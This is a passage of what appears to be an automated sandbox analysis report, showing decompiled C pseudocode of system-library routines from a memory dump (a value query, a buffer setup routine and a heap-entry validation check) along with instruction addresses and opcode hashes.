				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x1add360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E019F6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E01A2B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1ad7b9c; // 0x0
					_t74 = L01A04620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01A29650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L01A077F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E01A2F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E01A213C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L01A077F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01A29650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x019ec608
0x019ec615
0x019ec625
0x019ec62d
0x019ec635
0x019ec640
0x019ec680
0x019ec687
0x019ec688
0x019ec689
0x019ec694
0x019ec694
0x019ec642
0x019ec64a
0x019ec697
0x01a57a25
0x01a57a2b
0x01a57a2e
0x01a57a30
0x01a57bea
0x01a57bea
0x00000000
0x01a57bea
0x01a57a36
0x01a57a43
0x01a57a48
0x01a57a4c
0x01a57a4e
0x00000000
0x00000000
0x01a57a58
0x01a57a5a
0x01a57a5b
0x01a57a5c
0x01a57a5d
0x01a57a63
0x01a57a64
0x01a57a6a
0x01a57a6c
0x01a57a6e
0x01a579cb
0x01a579cb
0x01a579ce
0x01a579d0
0x01a57a98
0x01a57a9b
0x01a57a9b
0x01a57a9e
0x01a57aa1
0x01a57bbe
0x01a57bbe
0x01a57bc0
0x01a57be0
0x01a57be0
0x01a57a01
0x01a57a01
0x01a57a05
0x01a57a07
0x01a57a15
0x01a57a15
0x01a57a1a
0x00000000
0x01a57a1a
0x01a57bc2
0x01a57bc6
0x01a57bc9
0x01a57bcd
0x01a57bcf
0x01a579e6
0x01a579e6
0x01a579eb
0x01a579eb
0x01a579ef
0x01a579f1
0x00000000
0x00000000
0x01a579f3
0x01a579f5
0x01a579ff
0x01a579ff
0x00000000
0x01a579ff
0x01a579f7
0x01a579fd
0x00000000
0x00000000
0x00000000
0x01a579fd
0x01a57bd5
0x01a57bd8
0x00000000
0x00000000
0x01a57ba9
0x01a57bac
0x01a57bb0
0x01a57bb1
0x01a57bb1
0x01a57bb6
0x00000000
0x01a57bb6
0x01a57aa7
0x01a57aaa
0x00000000
0x00000000
0x01a57ab2
0x01a57ab3
0x01a57ab5
0x01a57aec
0x01a57aef
0x01a57b25
0x01a57b28
0x01a57b62
0x01a57b64
0x01a57b8f
0x01a57b92
0x01a57b96
0x01a57b98
0x00000000
0x00000000
0x01a57b9e
0x01a57b9f
0x01a57ba3
0x00000000
0x01a57ba3
0x01a57b66
0x01a57b68
0x01a57ae2
0x01a57ae2
0x00000000
0x01a57ae2
0x01a57b6e
0x01a57b72
0x01a57b75
0x01a57b81
0x01a57b85
0x01a57b87
0x00000000
0x00000000
0x01a57b31
0x01a57b34
0x01a57b3c
0x01a57b45
0x01a57b46
0x01a57b4f
0x01a57b51
0x01a57b57
0x01a57b59
0x01a57b59
0x00000000
0x01a57b59
0x01a57b77
0x00000000
0x01a57b77
0x01a57b2a
0x00000000
0x01a57b2a
0x01a57af1
0x01a57af3
0x00000000
0x00000000
0x01a57afb
0x01a57afc
0x01a57afe
0x00000000
0x00000000
0x01a57b00
0x01a57b03
0x00000000
0x00000000
0x01a57b05
0x01a57b09
0x01a57b0d
0x01a57b0f
0x00000000
0x00000000
0x01a57b18
0x01a57b1d
0x00000000
0x01a57b1d
0x01a57ab7
0x01a57ab9
0x00000000
0x00000000
0x01a57abf
0x01a57ac1
0x00000000
0x00000000
0x01a57ac3
0x01a57ac6
0x00000000
0x00000000
0x01a57ac8
0x01a57acc
0x01a57ad0
0x01a57ad2
0x00000000
0x00000000
0x01a57adb
0x00000000
0x01a57adb
0x01a579d6
0x01a579d9
0x01a579dc
0x01a57a91
0x01a57a94
0x00000000
0x01a57a94
0x01a579e2
0x00000000
0x01a579e2
0x01a57a74
0x01a57a7a
0x00000000
0x00000000
0x01a57a8a
0x01a57a21
0x01a57a21
0x00000000
0x01a57a21
0x019ec650
0x019ec651
0x019ec656
0x019ec65c
0x019ec65d
0x019ec663
0x019ec664
0x019ec66a
0x019ec66e
0x01a579c5
0x01a579c7
0x00000000
0x01a579c7
0x019ec67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 996ed647775e1a3bfe9e69b00c6aefe84dd9fb4200baccb45da7738a951561b3
Instruction ID: 0137cdabbc87f5dae85a3f05da7a990e1fbe13b0eacd48157421055a44aa3884
Opcode Fuzzy Hash: 996ed647775e1a3bfe9e69b00c6aefe84dd9fb4200baccb45da7738a951561b3
Instruction Fuzzy Hash: 4281A4756082429FDBA6CF98C880E7B77F5EB84354F99481AEE45EB241D330DD41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01A7B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E01A7B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1ad7b9c; // 0x0
				_t124 = L01A04620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01A29800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E01A295B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E01A295D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L01A077F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01A29910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E01A295D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1ad7b9c; // 0x0
									_t92 = L01A04620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01A29910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E019EA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E01A7E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E01A7E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E01A295B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x01a7b8d9
0x01a7b8e4
0x00000000
0x01a7b8e6
0x01a7b8f3
0x01a7b8f5
0x01a7b8f5
0x01a7b8f8
0x01a7b920
0x01a7b924
0x01a7b936
0x01a7b939
0x01a7b93d
0x01a7b948
0x01a7b9a0
0x01a7b9a0
0x01a7b9a4
0x01a7b9bf
0x01a7b9c4
0x01a7b9c6
0x01a7b9cd
0x01a7b9d1
0x01a7bad4
0x01a7bad8
0x01a7bada
0x01a7badc
0x01a7badc
0x01a7badf
0x01a7bae0
0x01a7bae2
0x01a7bae4
0x01a7baec
0x01a7baee
0x01a7baf0
0x01a7baf0
0x01a7baec
0x01a7bafb
0x01a7bafc
0x01a7bafe
0x01a7bb01
0x01a7bb01
0x00000000
0x01a7bb06
0x01a7b9d7
0x01a7b9db
0x01a7b9db
0x01a7b9de
0x01a7b9de
0x01a7b9e4
0x01a7b9e7
0x01a7b9ea
0x01a7b9ec
0x01a7b9ef
0x01a7b9f3
0x01a7ba1b
0x01a7ba1b
0x01a7ba23
0x01a7ba24
0x01a7ba27
0x01a7ba2a
0x01a7ba2b
0x01a7ba2e
0x01a7ba30
0x01a7ba37
0x01a7ba3f
0x01a7ba9c
0x01a7baa2
0x01a7bb13
0x01a7bb15
0x01a7baae
0x01a7baae
0x01a7bab3
0x01a7bab5
0x01a7baba
0x01a7bac8
0x01a7bac8
0x01a7baba
0x01a7bacd
0x01a7bacf
0x00000000
0x01a7bacf
0x01a7bb1a
0x00000000
0x01a7bb1c
0x01a7baa7
0x01a7bb11
0x00000000
0x01a7bb11
0x01a7baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x01a7ba41
0x01a7ba41
0x01a7ba41
0x01a7ba58
0x01a7ba5d
0x01a7ba62
0x00000000
0x00000000
0x01a7ba64
0x01a7ba67
0x01a7ba68
0x01a7ba69
0x01a7ba6c
0x01a7ba6f
0x01a7ba71
0x01a7ba78
0x01a7ba80
0x00000000
0x00000000
0x01a7ba90
0x01a7ba90
0x01a7ba97
0x00000000
0x01a7ba97
0x01a7b9f5
0x01a7b9f7
0x01a7b9f7
0x01a7b9fa
0x01a7ba03
0x01a7ba07
0x01a7ba0c
0x01a7ba10
0x01a7ba17
0x00000000
0x01a7b9f7
0x01a7b9a6
0x01a7b9a8
0x01a7b9af
0x01a7b9b3
0x00000000
0x00000000
0x01a7b9b9
0x00000000
0x01a7b9b9
0x01a7b94d
0x01a7b98f
0x01a7b995
0x01a7b999
0x01a7b960
0x01a7b967
0x01a7b968
0x01a7b96a
0x00000000
0x01a7b96a
0x01a7b99b
0x01a7b99e
0x00000000
0x00000000
0x00000000
0x01a7b99e
0x01a7b951
0x01a7b954
0x01a7b95a
0x01a7b95e
0x01a7b972
0x01a7b979
0x01a7b97d
0x01a7b97f
0x01a7b980
0x01a7b982
0x01a7b984
0x00000000
0x01a7b984
0x00000000
0x01a7b926
0x00000000
0x01a7b926

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 000b00fa29947f562660f7133f8ebe648cab43b0efb859212fa85b3af64594cf
Instruction ID: 9e92479ba2a4e2ac9df7698ebeea4ab52a1fef45ac856b8fd48d40d345ef5598
Opcode Fuzzy Hash: 000b00fa29947f562660f7133f8ebe648cab43b0efb859212fa85b3af64594cf
Instruction Fuzzy Hash: 2171F0B2200702AFE732EF28CD44F66BBB5EF44725F144528E655876A0DB71EA44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01AA1002, Relevance: .2, Instructions: 198
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E01AA1002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x1ad5898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x1ad58b0 = _t128;
								 *0x1ad58b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x1ad58b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x1ad58bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x1ad58bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x1ad58b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x1ad5898 = 7;
										return _t75;
									} else {
										 *0x1ad5898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x1ad5898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}

0x01aa1002
0x01aa100c
0x01aa100f
0x01aa1012
0x01aa1018
0x00000000
0x01aa102e
0x01aa1030
0x00000000
0x01aa1032
0x01aa1032
0x01aa1038
0x01aa1038
0x01aa121e
0x01aa11ff
0x01aa1205
0x01aa1207
0x01aa120c
0x01aa120e
0x01aa1210
0x01aa1212
0x01aa1212
0x01aa1210
0x01aa121c
0x01aa121c
0x01aa1228
0x01aa1228
0x01aa101c
0x01aa101c
0x01aa101c
0x01aa101f
0x01aa1022
0x01aa1025
0x01aa102c
0x01aa102c
0x00000000
0x01aa102c
0x01aa1027
0x01aa102a
0x01aa103f
0x01aa103f
0x01aa1042
0x01aa1044
0x01aa1047
0x01aa1049
0x01aa104c
0x01aa104e
0x01aa1088
0x01aa1088
0x01aa108a
0x01aa108d
0x01aa108f
0x01aa1091
0x01aa1091
0x01aa1093
0x01aa1095
0x01aa1097
0x01aa10c8
0x01aa10cb
0x01aa10ce
0x01aa10d0
0x01aa10f4
0x01aa10f4
0x01aa10fa
0x01aa1100
0x01aa1102
0x01aa1150
0x01aa1150
0x01aa1154
0x01aa1167
0x01aa116a
0x01aa116a
0x01aa1156
0x01aa1156
0x01aa1158
0x01aa115b
0x01aa115d
0x01aa115f
0x01aa115f
0x01aa115f
0x01aa1162
0x01aa1162
0x01aa116c
0x01aa116f
0x01aa1171
0x01aa117b
0x01aa117b
0x01aa117d
0x01aa1183
0x01aa1183
0x01aa1186
0x01aa1188
0x01aa1199
0x01aa118a
0x01aa118a
0x01aa118c
0x01aa118f
0x01aa1191
0x01aa1191
0x01aa1191
0x01aa1194
0x01aa1194
0x01aa119c
0x01aa11a2
0x01aa11a8
0x01aa11ac
0x01aa11af
0x01aa11c7
0x01aa11b1
0x01aa11b1
0x01aa11b4
0x01aa11b7
0x01aa11b9
0x01aa11b9
0x01aa11b9
0x01aa11bc
0x01aa11c2
0x01aa11c2
0x01aa11cb
0x01aa11ce
0x01aa11d4
0x01aa11e7
0x01aa11ed
0x01aa11ef
0x00000000
0x00000000
0x01aa11f1
0x00000000
0x01aa11d6
0x01aa11d6
0x00000000
0x01aa11d6
0x01aa11d4
0x01aa1104
0x01aa1106
0x00000000
0x00000000
0x01aa1108
0x01aa110c
0x01aa111d
0x01aa110e
0x01aa110e
0x01aa1110
0x01aa1113
0x01aa1115
0x01aa1115
0x01aa1115
0x01aa1118
0x01aa1118
0x01aa1126
0x01aa113a
0x01aa113d
0x01aa113f
0x00000000
0x01aa1141
0x01aa1141
0x00000000
0x01aa1141
0x01aa113f
0x01aa10d6
0x01aa10d9
0x01aa10dd
0x01aa10e3
0x01aa10e6
0x01aa10e9
0x00000000
0x00000000
0x01aa10ee
0x01aa10f0
0x01aa10f2
0x00000000
0x00000000
0x00000000
0x01aa10f2
0x00000000
0x01aa1099
0x01aa1099
0x01aa109c
0x01aa109c
0x01aa109e
0x01aa10a0
0x01aa10b3
0x01aa10a2
